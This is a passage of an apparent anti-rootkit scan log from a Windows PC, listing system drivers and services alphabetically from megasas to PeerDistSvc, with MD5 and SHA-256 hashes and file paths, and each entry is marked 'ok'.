21:27:06.0160 0x0ce4 megasas - ok
21:27:06.0163 0x0ce4 [ EEC64C8D498D121607C7615FDFBEE4D0, B605B9886C1A05C999B005AEA6D0677DF632E2F34F4FF03F09C2E6C05F554D50 ] megasas2i C:\WINDOWS\system32\drivers\MegaSas2i.sys
21:27:06.0169 0x0ce4 megasas2i - ok
21:27:06.0179 0x0ce4 [ 2B7D3B206833D769218A1F4BE2D73B97, 25901A5E931DC3659993448E59ABC3601B7B0ED9AFEF0F5ECC139D0D0442F73B ] megasr C:\WINDOWS\system32\drivers\megasr.sys
21:27:06.0193 0x0ce4 megasr - ok
21:27:06.0198 0x0ce4 [ E0EF6C1399A9B1AAA0B28590411BED04, 10C193D1ED434A6DC2AD8C450012B9AF1C848A0A0B3B775F13495648FB77E009 ] MEIx64 C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys
21:27:06.0204 0x0ce4 MEIx64 - ok
21:27:06.0207 0x0ce4 [ 4F708DA590EDBCC124FB79066D44759B, B8DA803299AF5FDE1594CF958EA6B99D4B99E8163438A70A692CA33A96DBF8DE ] MessagingService C:\WINDOWS\System32\MessagingService.dll
21:27:06.0216 0x0ce4 MessagingService - ok
21:27:06.0231 0x0ce4 [ 89257B8D3826B5629CF7F73F97DA44F9, F056D67EC82072BA209FF7942862862FDF562F8C038F3128861C387F8F63B494 ] mlx4_bus C:\WINDOWS\System32\drivers\mlx4_bus.sys
21:27:06.0249 0x0ce4 mlx4_bus - ok
21:27:06.0253 0x0ce4 [ 9AE3C0CC0865B1618A3C97744A6A9E9B, BF72AEF0360AC278B36ED31E5BFC2E8F72136B0952490A105CB6929654C97F6C ] MMCSS C:\WINDOWS\system32\drivers\mmcss.sys
21:27:06.0261 0x0ce4 MMCSS - ok
21:27:06.0264 0x0ce4 [ 0CD29540C32C2E2E0E3D7E9832752AF3, E64C3F5323C59D53409E33E88989FDD2A38B5B602336FC1D8C3702CA9B5EBFC7 ] Modem C:\WINDOWS\system32\drivers\modem.sys
21:27:06.0272 0x0ce4 Modem - ok
21:27:06.0275 0x0ce4 [ 534477FCAFDFCA6B841BFA06BD26BCC5, 96404FDF0BA2127A3BD24319637EC0C8BE8C42618D9FEDF66F41C5F72840D427 ] monitor C:\WINDOWS\System32\drivers\monitor.sys
21:27:06.0282 0x0ce4 monitor - ok
21:27:06.0286 0x0ce4 [ F5D4E18A70BA069D479154442CDEB60D, 96345E88BC6A50415E112A4B4CFDF3F4306EA049741C5B0A2BFFC142F15EB5CB ] mouclass C:\WINDOWS\System32\drivers\mouclass.sys
21:27:06.0291 0x0ce4 mouclass - ok
21:27:06.0294 0x0ce4 [ 5C09868963B0C076AC3BC7759A46B7B1, 64CD200A8D90CDC31317009636A3BB6574ABF04BCAC903F93C47823C40CC03F6 ] mouhid C:\WINDOWS\System32\drivers\mouhid.sys
21:27:06.0302 0x0ce4 mouhid - ok
21:27:06.0306 0x0ce4 [ 8BF7039787036529B98E50AE86A0E46B, 69C04D012D026A14E2D2A138EDA79227F9BE4BE1892D517DCDB797F2A5AEDB14 ] mountmgr C:\WINDOWS\system32\drivers\mountmgr.sys
21:27:06.0312 0x0ce4 mountmgr - ok
21:27:06.0317 0x0ce4 [ 260DB638038D0D9ACCBFCA9F2BF9B692, 68B9454D1E10A5A710AA3F823C7EAF2E8F3DDF5534262AC289BF454FC829B0B7 ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
21:27:06.0324 0x0ce4 MozillaMaintenance - ok
21:27:06.0328 0x0ce4 [ AD118EC95E9EF4D5223D681D8F183567, 395B76626956F5B7992676B9CA57B2CA075F0CDA881E14B3ED07ABE2DC0EEDBC ] mpsdrv C:\WINDOWS\system32\drivers\mpsdrv.sys
21:27:06.0335 0x0ce4 mpsdrv - ok
21:27:06.0351 0x0ce4 [ FA53A01517BBA97EA3B71CF5CC2052F4, C6F7CBDFAD629B2D4B6ED6A471708E8DBEB5CD5E0A992848359D3C0A82FDFCBE ] MpsSvc C:\WINDOWS\system32\mpssvc.dll
21:27:06.0378 0x0ce4 MpsSvc - ok
21:27:06.0384 0x0ce4 [ D14C297933C82B8CB0B5CBBA4DDC830B, 2EF356F5373F16A7AE2421187FC5C150C09452C835229275B7403181D65C210F ] MRxDAV C:\WINDOWS\system32\drivers\mrxdav.sys
21:27:06.0395 0x0ce4 MRxDAV - ok
21:27:06.0404 0x0ce4 [ F2AD1B72C5A6475FB5FF332E1980DF88, 41E24496FBD61C0A333F567DA7C4E38C5A792724FB56448189099F60114749D5 ] mrxsmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
21:27:06.0416 0x0ce4 mrxsmb - ok
21:27:06.0423 0x0ce4 [ 469DD958B1D8CB09E38BE2298B8C398D, 97CCEFF58D8865B0D27C4E16B082C20FA5279CF01A37F47B5F2DA39B334F0667 ] mrxsmb10 C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys
21:27:06.0434 0x0ce4 mrxsmb10 - ok
21:27:06.0440 0x0ce4 [ 1FC4802B593494746B6FE3BDAC25E371, 774CC950B46B3E32603D368D9938BFCF60D2BB3C14C3FE8B03CB1E724AAC29EF ] mrxsmb20 C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys
21:27:06.0449 0x0ce4 mrxsmb20 - ok
21:27:06.0453 0x0ce4 [ BD12E1941A87671A767447B02C6A51A1, 7FCB3077E827639CE23CC2C6FE997A33F7A702D266C0277AF01453B5ACC0966D ] MsBridge C:\WINDOWS\system32\drivers\bridge.sys
21:27:06.0462 0x0ce4 MsBridge - ok
21:27:06.0467 0x0ce4 [ 41C5D9B52F4A1B30C3F7219D601CF12C, E1C1B1CED19D32FA1B765C7C380B9E749893B2018CF358F448E40DA60CB63166 ] MSDTC C:\WINDOWS\System32\msdtc.exe
21:27:06.0478 0x0ce4 MSDTC - ok
21:27:06.0482 0x0ce4 [ 92C00BD9616F353CA59A755C33269757, E67F05A4A1C44137CCAC0C7292A7010B5920172ACAE32638600E231F28F33035 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
21:27:06.0489 0x0ce4 Msfs - ok
21:27:06.0492 0x0ce4 [ F27EC8F7A0A779276E5DA2E70C2B01EE, A450DB309F84CAFFCE2A720612BDB260D88E9C390D2BC60874D73A55D8567E04 ] msgpiowin32 C:\WINDOWS\System32\drivers\msgpiowin32.sys
21:27:06.0498 0x0ce4 msgpiowin32 - ok
21:27:06.0501 0x0ce4 [ CBA955A54C9446CAAD28C76789D3B071, F6CA1BECA35B13B7CCC9FFB325FACF22713F6B81E8A6540C9967A462E425BBEC ] mshidkmdf C:\WINDOWS\System32\drivers\mshidkmdf.sys
21:27:06.0507 0x0ce4 mshidkmdf - ok
21:27:06.0510 0x0ce4 [ E8E568EF60677E4534F387C53EE1B35F, 2E250EE1A9AE8AFDCA5216BED87328B05713386BD7E61C66A74EF021F2AFE7D7 ] mshidumdf C:\WINDOWS\System32\drivers\mshidumdf.sys
21:27:06.0516 0x0ce4 mshidumdf - ok
21:27:06.0520 0x0ce4 [ 16376B7B0730C04DD1A2C0CC8E09E420, 2F39D3254FD272E277B5496A8C93A7CBFBF80F6004AE0343BE9F09C538975910 ] msisadrv C:\WINDOWS\system32\drivers\msisadrv.sys
21:27:06.0525 0x0ce4 msisadrv - ok
21:27:06.0530 0x0ce4 [ 75FE54E84C1EB0C9C5E09F9FD5928ECC, 971CFEE8FB8364D17CD392E32A32AE57BE6461EAB6C580B52E6D752D4CFDD6B3 ] MSiSCSI C:\WINDOWS\system32\iscsiexe.dll
21:27:06.0540 0x0ce4 MSiSCSI - ok
21:27:06.0542 0x0ce4 msiserver - ok
21:27:06.0545 0x0ce4 [ B26E1C10C8323D2B6ADAF504CD487757, 758DBCDA43D62547ED274D2E09A66B266470C86A89A3BEF387E535DB37A7EA44 ] MSKSSRV C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys
21:27:06.0558 0x0ce4 MSKSSRV - ok
21:27:06.0562 0x0ce4 [ E40B960078A15D4901265D32E071C42D, AC11B8221C8F529FE3CA6FEB99AF699664C86008A732C3A8E6B1CE31C2272454 ] MsLldp C:\WINDOWS\system32\drivers\mslldp.sys
21:27:06.0570 0x0ce4 MsLldp - ok
21:27:06.0573 0x0ce4 [ B4860AB91DC4E73936F0FF504D6B4B07, 7371093D9EB62218D20F6B8B3C88CBF01932AEA2923ED119962A78BE46E5A939 ] MSPCLOCK C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys
21:27:06.0586 0x0ce4 MSPCLOCK - ok
21:27:06.0589 0x0ce4 [ 8EDC45C3F7F64A51C98B59E24648F74B, 445731F32A37A99FAB3CD5D178A84FB4F835727826211FF18623409D29FF3A1A ] MSPQM C:\WINDOWS\system32\DRIVERS\MSPQM.sys
21:27:06.0602 0x0ce4 MSPQM - ok
21:27:06.0609 0x0ce4 [ 7DA5FAC2A49D30CA5B7B96B8B26281AC, 168C3AA5C7318184D8F67EA832920FCE64E11D4CC418517D7BDACB9632F0BEA8 ] MsRPC C:\WINDOWS\system32\drivers\MsRPC.sys
21:27:06.0620 0x0ce4 MsRPC - ok
21:27:06.0626 0x0ce4 [ 4369BBFCDDCCE61856DD862C8E5C4E19, 23BA06675997A3A46723D0FC9E3DFEBC17E4149FC67B9DCED3011BBB5B5DCFF9 ] MsSecFlt C:\WINDOWS\system32\drivers\mssecflt.sys
21:27:06.0635 0x0ce4 MsSecFlt - ok
21:27:06.0638 0x0ce4 [ 7E3365C8BC83DCE88D6226BB5C7170C4, 69D741039CAAFCA93A4CC09CEC14F117527D732A6CF3077AA83E935B03EC3F9C ] mssmbios C:\WINDOWS\System32\drivers\mssmbios.sys
21:27:06.0644 0x0ce4 mssmbios - ok
21:27:06.0646 0x0ce4 [ 09D51564E49181E9928910D6B91C920E, FB3C918820ACF4506AC49478709B4D4C6489BA0B5113E666C34B916CA5CD6DE7 ] MSTEE C:\WINDOWS\system32\DRIVERS\MSTEE.sys
21:27:06.0660 0x0ce4 MSTEE - ok
21:27:06.0662 0x0ce4 [ 793AE56A3946EAD5F906C28D294FEFE6, BB563D088084026606C2FBD30A0850BA18363CC173CC6C77272D727CA6C1F9BD ] MTConfig C:\WINDOWS\System32\drivers\MTConfig.sys
21:27:06.0669 0x0ce4 MTConfig - ok
21:27:06.0674 0x0ce4 [ E35F51C7474A26680627477462715206, 435490915CDD416D666B64C6B4526285EC946E6918CFA85585692B9ED43518B6 ] Mup C:\WINDOWS\system32\Drivers\mup.sys
21:27:06.0681 0x0ce4 Mup - ok
21:27:06.0684 0x0ce4 [ 74BD1149BF50F1E24934042A3BD17C90, DC4626DC4D629CA7DF336EC7E6435F27D2E252D81945E57F4BF2C981DBCD9B45 ] mvumis C:\WINDOWS\system32\drivers\mvumis.sys
21:27:06.0690 0x0ce4 mvumis - ok
21:27:06.0701 0x0ce4 [ 39C772E20B8C61858F969E4D60699D89, 32146D265CD315597C48FB233D77DDACB0FEDDB7E800A0F411A67844BB3ACC67 ] NativeWifiP C:\WINDOWS\system32\DRIVERS\nwifi.sys
21:27:06.0726 0x0ce4 NativeWifiP - ok
21:27:06.0739 0x0ce4 [ BC80F85C129F12A5F64D6741A120B539, AD410F13BCBDE54F98E353BD4DAF30CC5A0A9990FC4F1AB3623EF3175EEBCAF7 ] NaturalAuthentication C:\WINDOWS\System32\NaturalAuth.dll
21:27:06.0767 0x0ce4 NaturalAuthentication - ok
21:27:06.0772 0x0ce4 [ F2EA6F3165E154C24C084AC35DD6C3F8, 4F8CB75770945F5A28CC308917A124109F7462CE933695B9CAA3FE2CAE76C445 ] NcaSvc C:\WINDOWS\System32\ncasvc.dll
21:27:06.0783 0x0ce4 NcaSvc - ok
21:27:06.0790 0x0ce4 [ 9B3C6582CFB91BA2A04B1D06D8E2FB98, 431E6B075FD24002724E8A2ED9FB3221AD66D1F1D021B56466187D97E5B43A1F ] NcbService C:\WINDOWS\System32\ncbservice.dll
21:27:06.0804 0x0ce4 NcbService - ok
21:27:06.0808 0x0ce4 [ 932E2E43078A3D786A46A5428F21B314, 17F1CC3388D80F1E1850063114C1EB72EEA149D9C8FA3501C0F9EB55C9E0C58D ] NcdAutoSetup C:\WINDOWS\System32\NcdAutoSetup.dll
21:27:06.0820 0x0ce4 NcdAutoSetup - ok
21:27:06.0824 0x0ce4 [ 0FFE8AF1B94C5FD54E6ACC6DAE990D31, B67D3CA3460D4700D8B83EFE4B6A7AA940650E84D985484FBAA1EE80F3632133 ] ndfltr C:\WINDOWS\System32\drivers\ndfltr.sys
21:27:06.0831 0x0ce4 ndfltr - ok
21:27:06.0850 0x0ce4 [ E27876B335FEB441DA511030AA85624D, 6B4FA08463166A2B32F317E6FEDE3C22EB8FFA5B2077955A0B2F2184858BDDE7 ] NDIS C:\WINDOWS\system32\drivers\ndis.sys
21:27:06.0875 0x0ce4 NDIS - ok
21:27:06.0879 0x0ce4 [ 4EA73CFDEE4A628D387D95464A131F29, 38A6E2389FA9B20A7AFDF3CFCD13B66489B92D853EE486BF81019F0A36A142E1 ] NdisCap C:\WINDOWS\system32\drivers\ndiscap.sys
21:27:06.0892 0x0ce4 NdisCap - ok
21:27:06.0897 0x0ce4 [ EB127689AF6F24091AB73538A556257F, BC25067D355084D6893E9262750433044C28893BB27A67BF7AF5008742C6D359 ] NdisImPlatform C:\WINDOWS\system32\drivers\NdisImPlatform.sys
21:27:06.0911 0x0ce4 NdisImPlatform - ok
21:27:06.0914 0x0ce4 [ 73B4C72FB6170A08C64BDA92DE93ECF7, 766BBE659232F0F5EAEE577EE88091FB76175BC52D65B9637126069C97E795D4 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
21:27:06.0928 0x0ce4 NdisTapi - ok
21:27:06.0931 0x0ce4 [ 6704F27EB15A5B30AA7FA5A4F4D1FD47, 841F99B3C751F4D4E23C0E7B5C275B4871C1D5EF937A93129DF64DF49F6B6736 ] Ndisuio C:\WINDOWS\system32\drivers\ndisuio.sys
21:27:06.0938 0x0ce4 Ndisuio - ok
21:27:06.0941 0x0ce4 [ FE87CCAA89433FC306A80F15E848F4B2, 3269FDF53DA59057E066D582FCBB96B71C8063B8F488856A9DEA414B4797E43A ] NdisVirtualBus C:\WINDOWS\System32\drivers\NdisVirtualBus.sys
21:27:06.0949 0x0ce4 NdisVirtualBus - ok
21:27:06.0954 0x0ce4 [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] NdisWan C:\WINDOWS\System32\drivers\ndiswan.sys
21:27:06.0971 0x0ce4 NdisWan - ok
21:27:06.0977 0x0ce4 [ 94517BC9F29A1B73D377F1BF1C3DCA34, 45A34D7AAA851C643E80C0F61CBF8544B8A2E8E7DAB2D5AB6F3A34FDEE4AB0B3 ] ndiswanlegacy C:\WINDOWS\system32\DRIVERS\ndiswan.sys
21:27:06.0994 0x0ce4 ndiswanlegacy - ok
21:27:06.0997 0x0ce4 [ AC6AC99075732F5C29DB0004DD5B1AC6, 684EC821EF5C60DA540CA36EC192B09E62440AAD5B13F0F4C23DDC4A9B96F28C ] ndproxy C:\WINDOWS\system32\DRIVERS\NDProxy.sys
21:27:07.0012 0x0ce4 ndproxy - ok
21:27:07.0016 0x0ce4 [ 9AC090451D92E6081EB89CDA83D74189, D4D442412F112853AA8D88DFB5F695AE4E8E2C361905992537EE53BE675FECE8 ] Ndu C:\WINDOWS\system32\drivers\Ndu.sys
21:27:07.0032 0x0ce4 Ndu - ok
21:27:07.0036 0x0ce4 [ A115DDB2C7805C41EEC9A5276FF5764E, FC81D0BE2DAAC6E7161C0FC5C90050022A39AD50E28040D5357C0E1FD6C0B6B5 ] NetAdapterCx C:\WINDOWS\system32\drivers\NetAdapterCx.sys
21:27:07.0045 0x0ce4 NetAdapterCx - ok
21:27:07.0049 0x0ce4 [ F420B6CAB5151A38E4DBBFFB500C11DA, 271F495B261461B8EA847BFDD87C155E6DC1B6236C161B8253A1F023706B1B1D ] NetBIOS C:\WINDOWS\system32\drivers\netbios.sys
21:27:07.0055 0x0ce4 NetBIOS - ok
21:27:07.0062 0x0ce4 [ 30C2F67EC84EB11B22011620107E0325, 98088685F457566FD8D13B83A0BF6B06CDC70AC156B67BF87A8A8446C150C1F3 ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
21:27:07.0076 0x0ce4 NetBT - ok
21:27:07.0079 0x0ce4 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] Netlogon C:\WINDOWS\system32\lsass.exe
21:27:07.0086 0x0ce4 Netlogon - ok
21:27:07.0092 0x0ce4 [ D9FF8CA42C3541F4840693F17143C595, B05FB0B6439B34BD93EE59DC48BBE3D712A7428EFBFE37A887CE8546E57EE68F ] Netman C:\WINDOWS\System32\netman.dll
21:27:07.0105 0x0ce4 Netman - ok
21:27:07.0114 0x0ce4 [ 96173660A4DD4A56E4B8938A67DAD9B7, F1D8F94625C6461DB89F8D3BDC73748F8A7F3446694BD1F148AF9BE6F17E9543 ] netprofm C:\WINDOWS\System32\netprofmsvc.dll
21:27:07.0137 0x0ce4 netprofm - ok
21:27:07.0143 0x0ce4 [ 79C810D49E6D2825F51B0D7CAA6E2FAD, 19B7FB87FC8CE8FEA456F06D32099ED5B69FE38D2954580D4CEC32998D206E9F ] NetSetupSvc C:\WINDOWS\System32\NetSetupSvc.dll
21:27:07.0156 0x0ce4 NetSetupSvc - ok
21:27:07.0162 0x0ce4 [ 4D37150AB4D61598919AB70ACFD1369A, 9ABF73213988ED9AA72B2658F8B91967A24C7CC2049859D86CE9C51A4AB57A84 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
21:27:07.0169 0x0ce4 NetTcpPortSharing - ok
21:27:07.0173 0x0ce4 [ 8C03F2F5A9E93AEB08B3AEE51552394A, F95185FB8D5FDEAB39E593488BA6ABCFA9C081BFED05008E0CD95F29B894AFC8 ] netvsc C:\WINDOWS\System32\drivers\netvsc.sys
21:27:07.0181 0x0ce4 netvsc - ok
21:27:07.0191 0x0ce4 [ 0C124EAC0EF7B3767280C94A8C03615B, D10216726A221C8FBC67C47F4B266C271A7C7A4438F77AC44BB561E0A6EB6D34 ] NgcCtnrSvc C:\WINDOWS\System32\NgcCtnrSvc.dll
21:27:07.0209 0x0ce4 NgcCtnrSvc - ok
21:27:07.0225 0x0ce4 [ 6A3DA98447EF49AEB7931ECFBA51AFAD, 9F8E7313E6FD1F46AF22C9C58C877869E73848F459A73F16E0A6AC261BC483DE ] NgcSvc C:\WINDOWS\system32\ngcsvc.dll
21:27:07.0253 0x0ce4 NgcSvc - ok
21:27:07.0261 0x0ce4 [ 50F98CD010326B58F09082BACF3123AE, 124446A2905E23BB3F5763E347842F3F511EC44C37C2F85E409F73EC8F53924E ] NlaSvc C:\WINDOWS\System32\nlasvc.dll
21:27:07.0281 0x0ce4 NlaSvc - ok
21:27:07.0286 0x0ce4 [ EF729C076C2B75B5CB431482DE1E07B3, 834A450F1FDA3615213DC340B5CCFADE326082427CEE3179D32A3C462A1F251F ] NNSALPC C:\WINDOWS\system32\DRIVERS\NNSALPC.sys
21:27:07.0292 0x0ce4 NNSALPC - ok
21:27:07.0297 0x0ce4 [ 0E6EDE400CDDEE1D76CB6B4EF9076130, 2216F3508F3A59E0FF0844F07EC6413A457BD3370B2AA657D8B6D504EE7B8C21 ] NNSHTTP C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys
21:27:07.0305 0x0ce4 NNSHTTP - ok
21:27:07.0309 0x0ce4 [ BA0A6276D2DDCE642D4017AC0E014C54, 983E2F8EE5A8732C5849DC887D4670C91F0AC882E128DCA5B1B3F9A071FF2628 ] NNSHTTPS C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys
21:27:07.0314 0x0ce4 NNSHTTPS - ok
21:27:07.0319 0x0ce4 [ FB1E93069755A75F8F92FEAD94078362, CD9EE8F217408405BCD41DB197A5447AC35A668E11FE6E2DEFA20D082AC3E44E ] NNSIDS C:\WINDOWS\system32\DRIVERS\NNSIDS.sys
21:27:07.0325 0x0ce4 NNSIDS - ok
21:27:07.0328 0x0ce4 [ E4B9C6200A8A1213FD29FAF3C42F5F22, 32B21D03BAE08418E5E3B41D7A792378F9915A4AE24C9007B5192E98D480C12B ] NNSNAHSL C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys
21:27:07.0332 0x0ce4 NNSNAHSL - ok
21:27:07.0337 0x0ce4 [ 8EAF0E189340D0AA6E36FD3DBFCA06E6, 8096A89503BC8AD08CD3F197AD6160C8813B8EC115ABE2FFC42E21F415693A43 ] NNSPICC C:\WINDOWS\system32\DRIVERS\NNSPICC.sys
21:27:07.0342 0x0ce4 NNSPICC - ok
21:27:07.0346 0x0ce4 [ 1AED3FBBFC200384BFDA528E96ACA62F, F3EE27DAFF90376203FB0F1026CF25995026AAD23B624C3075085A1811509A1B ] NNSPIHSW C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys
21:27:07.0351 0x0ce4 NNSPIHSW - ok
21:27:07.0356 0x0ce4 [ 8E2B94D8ED57BADF66532D48963F5260, A3B928F17726D615080065B3D174438EF989E89693C0C22CDEF902DEE2707047 ] NNSPOP3 C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys
21:27:07.0362 0x0ce4 NNSPOP3 - ok
21:27:07.0369 0x0ce4 [ 51A96D0C6294DE0A44C60173B11B43FD, 5366037D4B8D63C8EF03E3BB68D5FEC04CBB33B5BD10554D8B9533CECCA4753F ] NNSPROT C:\WINDOWS\system32\DRIVERS\NNSPROT.sys
21:27:07.0377 0x0ce4 NNSPROT - ok
21:27:07.0382 0x0ce4 [ 1203E755CE66B47F981A14D683483A46, 6E84597954A0F0A9A50EFCE0431D0A23790410DDFAEC048B5EC86C0F4137D0A3 ] NNSPRV C:\WINDOWS\system32\DRIVERS\NNSPRV.sys
21:27:07.0389 0x0ce4 NNSPRV - ok
21:27:07.0393 0x0ce4 [ 73D22EA5489439A77E7AFF1A476AF4D7, 6B07B76EF0AD2C1886E0AD88CA6501A3EBBEC1AABC8F5B6CEC8DA3E8071BE5BC ] NNSSMTP C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys
21:27:07.0399 0x0ce4 NNSSMTP - ok
21:27:07.0407 0x0ce4 [ FCAA6139267BE6BD579BE63A35D1B09C, 3F023A9C313DE53C9A5425542F4D472C516E4B928EFD33A0118F07149A4643FF ] NNSSTRM C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys
21:27:07.0415 0x0ce4 NNSSTRM - ok
21:27:07.0419 0x0ce4 [ 7913A4658185DB56594E22F1A418D8DD, C4B4C771763F03ADDCC288EBF24D895AB8590101A722BB6010F88062F1681457 ] NNSTLSC C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys
21:27:07.0425 0x0ce4 NNSTLSC - ok
21:27:07.0428 0x0ce4 [ 6D8F6A9C53CFB0C49E8251A442B7283F, C3E913E4997C35A9B4C2E613A499F01D15264EAB699B93269B690B2A74A70E9A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
21:27:07.0437 0x0ce4 Npfs - ok
21:27:07.0439 0x0ce4 [ BABF7E1757D6908941C9F9CBD66A5EF0, 323E743CB26583763A9C5DE64E7E08138CB8D3E2DE0A8BCE9F774E1C7426E7F8 ] npsvctrig C:\WINDOWS\System32\drivers\npsvctrig.sys
21:27:07.0446 0x0ce4 npsvctrig - ok
21:27:07.0449 0x0ce4 [ A85EB5721C7203AAAAAA04F551960CD9, E61ED728E154799346C749159BFE36FAEB2CE64FC5735F533B910017D66A7EE5 ] nsi C:\WINDOWS\system32\nsisvc.dll
21:27:07.0457 0x0ce4 nsi - ok
21:27:07.0460 0x0ce4 [ 7A6BA778B48DF9FB7AC231D4FF6E3248, 5959CA59C75D2C4DD8A539CAA8D99EF6A0CB5AA3F0D485B14C8B35911748F1F7 ] nsiproxy C:\WINDOWS\system32\drivers\nsiproxy.sys
21:27:07.0467 0x0ce4 nsiproxy - ok
21:27:07.0501 0x0ce4 [ 731FD52461C8107E5B19B9AEDBB82BFB, 51B6722B9B2863B4AE23CE6B1DBD8481DA341748196BD482C6C5F4A6959F24F9 ] NTFS C:\WINDOWS\system32\drivers\NTFS.sys
21:27:07.0542 0x0ce4 NTFS - ok
21:27:07.0548 0x0ce4 [ 4FFB2D5655D10700D5B8E205C4DB86BD, 69078960669A373F9C2D47AF2ED841619831106B681EBAAEAAE5BD569A54CE6D ] Null C:\WINDOWS\system32\drivers\Null.sys
21:27:07.0555 0x0ce4 Null - ok
21:27:07.0559 0x0ce4 [ 99EB6376EC2C03CE5F668577651E3454, A783FFBF89A9074E2074ACAF3F55862DF2F05CAFEAF6A2D509DDA665EB0D59CB ] nvdimmn C:\WINDOWS\System32\drivers\nvdimmn.sys
21:27:07.0567 0x0ce4 nvdimmn - ok
21:27:07.0572 0x0ce4 [ 3DB2E9E207358BFBD09B77B5119ECA5B, 55FED85EFC06B7AB5031D9986E4E4D2FA8841C549081ABBA9F9D9BBAB7852B37 ] nvraid C:\WINDOWS\system32\drivers\nvraid.sys
21:27:07.0580 0x0ce4 nvraid - ok
21:27:07.0588 0x0ce4 [ 4C04BFBD4DB2EECCC47F5FA39D65BB6E, 9312DC4F7000991946D92D87DD9D37D70E336629EDBA553BFC79804049E34B73 ] nvstor C:\WINDOWS\system32\drivers\nvstor.sys
21:27:07.0595 0x0ce4 nvstor - ok
21:27:07.0602 0x0ce4 [ 0D611DC17E48B6F8DD466A089170D118, E55A78E2CC6A0A5F7B8F0B75DFB2297FBC3B959C4FDEFBEA1C6C4E7706724AEB ] OneSyncSvc C:\WINDOWS\System32\APHostService.dll
21:27:07.0622 0x0ce4 OneSyncSvc - ok
21:27:07.0652 0x0ce4 [ 29B093BA6759118DB14AF41026385E03, 660176D122344A79E52FFD9FE3D32D1967D9B22BC4AD76549D839B09693D0713 ] Origin Client Service C:\Program Files (x86)\Origin\OriginClientService.exe
21:27:07.0683 0x0ce4 Origin Client Service - ok
21:27:07.0692 0x0ce4 [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] p2pimsvc C:\WINDOWS\system32\pnrpsvc.dll
21:27:07.0706 0x0ce4 p2pimsvc - ok
21:27:07.0714 0x0ce4 [ D1A9C22A98A10EB11A190B8FC7C07C6A, 1DE5F07E707DA9D833F105A8D948BBAEF0172DB2147D9A665EC7320F88D57B9E ] p2psvc C:\WINDOWS\system32\p2psvc.dll
21:27:07.0730 0x0ce4 p2psvc - ok
21:27:07.0734 0x0ce4 [ 2CC6C325B271C7CA60F374F8F868CB45, 569391CA5DF003ED33CAA89FD38834641023C24F7FAE2261F6DA8ABC5CC9C3C9 ] Parport C:\WINDOWS\System32\drivers\parport.sys
21:27:07.0742 0x0ce4 Parport - ok
21:27:07.0747 0x0ce4 [ 664B7DDEE982ADF5EAB480C75B9F6218, 1D1403CBD75916B83EEFA9B235E237583C40025C87C13676247F1EAD3F1D33EE ] partmgr C:\WINDOWS\system32\drivers\partmgr.sys
21:27:07.0754 0x0ce4 partmgr - ok
21:27:07.0763 0x0ce4 [ 72ABB842C15A6C3AC3D954308C6BF206, 8F2A69E3BE43BCD2C8A39153062216B5CCEC9FA62205EC8A23FAB209DFAE7062 ] PcaSvc C:\WINDOWS\System32\pcasvc.dll
21:27:07.0778 0x0ce4 PcaSvc - ok
21:27:07.0785 0x0ce4 [ C5B74C6D87E77BC64DEBD1BF57DEB375, AEBC86E404D4E3985D9FBAD9913AC52127DDE7C79062830717CDFEEA4CD7CC0B ] pci C:\WINDOWS\system32\drivers\pci.sys
21:27:07.0796 0x0ce4 pci - ok
21:27:07.0799 0x0ce4 [ CFB85CB7A6F6926EA0EB96EDFB3C8A91, 7B3A58C165DF231BB202D8A2036272932439864F8EBDC62811E2BEFA8B36FC01 ] pciide C:\WINDOWS\system32\drivers\pciide.sys
21:27:07.0805 0x0ce4 pciide - ok
21:27:07.0809 0x0ce4 [ 13B7D84B397A90E82682C47A15C3A98D, 7F897DA83209381A8C26B34416899E276256AB587DC4E2B60B185CAC8D1877F0 ] pcmcia C:\WINDOWS\system32\drivers\pcmcia.sys
21:27:07.0817 0x0ce4 pcmcia - ok
21:27:07.0820 0x0ce4 [ 76EA512FD9D4673CF7A57775EE8922E2, 6D2B90616A46BC4F9BB6BACBD78EB33C23834987365C87617AFC2E147871C984 ] pcw C:\WINDOWS\system32\drivers\pcw.sys
21:27:07.0826 0x0ce4 pcw - ok
21:27:07.0830 0x0ce4 [ 4A88D29869609A39782EF53145E6F7CA, 6200E0B96FD0289D7F95779723E3CABBDEE17EDE5F802CC51E5539F475711027 ] pdc C:\WINDOWS\system32\drivers\pdc.sys
21:27:07.0837 0x0ce4 pdc - ok
21:27:07.0849 0x0ce4 [ 4F190BA3C9BD2F0277BCBF480F396091, F09613C76350706992B39D7EA9B859D28F00790E5AC17CA7D49C3E270B9D8994 ] PEAUTH C:\WINDOWS\system32\drivers\peauth.sys
21:27:07.0877 0x0ce4 PEAUTH - ok
21:27:07.0906 0x0ce4 [ F5C8E47E2F7B72ACEA49F7AD2EA60D3B, 184B5C91BF36A03257A38E8FB5FDBEF96AE88F0F5FF2EEEAE7BFC6CA15CC1602 ] PeerDistSvc C:\WINDOWS\system32\peerdistsvc.dll
21:27:07.0953 0x0ce4 PeerDistSvc - ok
